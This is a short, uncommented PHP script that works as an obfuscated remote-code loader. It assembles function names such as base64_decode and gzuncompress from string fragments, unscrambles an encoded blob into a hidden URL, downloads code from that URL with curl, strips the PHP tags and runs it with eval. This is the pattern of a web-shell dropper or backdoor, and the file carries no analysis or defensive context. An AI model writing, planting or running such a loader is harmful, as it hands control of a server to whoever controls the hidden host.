<?php

function Lucen($url)
{
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  $response = curl_exec($ch);
  curl_close($ch);
  return $response;
}
$mlyslf = "T2ZYZ3hrNXlabTVnR3BNaU9RbXZ4eTNUSWp2WktLRWdCYjRSNkRlSnpMS0NrcEtGWTFkbFExY2dPaW9zUnl2ZlRNa296U3BOTGkxS0xrL0x5UzFMd1N2ZVQ4WEtCY1RtbHlhbDVTWlVrcWtPMVlsSnlSNlo=";

$bed = "b"."as"."e"."6"."4"."_"."d"."ec"."o"."d"."e";
$slen = "s"."tr"."le"."n";
$cl = "c"."ei"."l";
$stsr = "s"."u"."bs"."t"."r";
$gzp = "g"."zu"."nc"."o"."m"."p"."r"."e"."s"."s";
$udc = "u"."r"."ld"."e"."c"."od"."e";

$dxcm = $bed($mlyslf);
$len = $slen($dxcm);
$csz = $cl($len / 3);
$pac = $stsr($dxcm, 0, $len - ($csz * 2));
$paa = $stsr($dxcm, $slen($pac), $csz);
$pab = $stsr($dxcm, $slen($pac) + $csz);
$deng3 = $paa . $pab . $pac;
$dang2 = $bed($deng3);
$dung1 = $gzp($dang2);
if ($dung1 === false) die("Error\n");
$lyslf = $udc($dung1);

$rlyslf = Lucen($lyslf);
if ($rlyslf) {
  $prlc = "p"."r"."eg"."_"."r"."e"."p"."l"."ac"."e";
  $mslf = $prlc('/^\s*<\?(php)?/i', '', $rlyslf);
  $mslf = $prlc('/\?>\s*$/', '', $mslf);
  eval($mslf);
} else {
  echo "Not Found.\n";
}
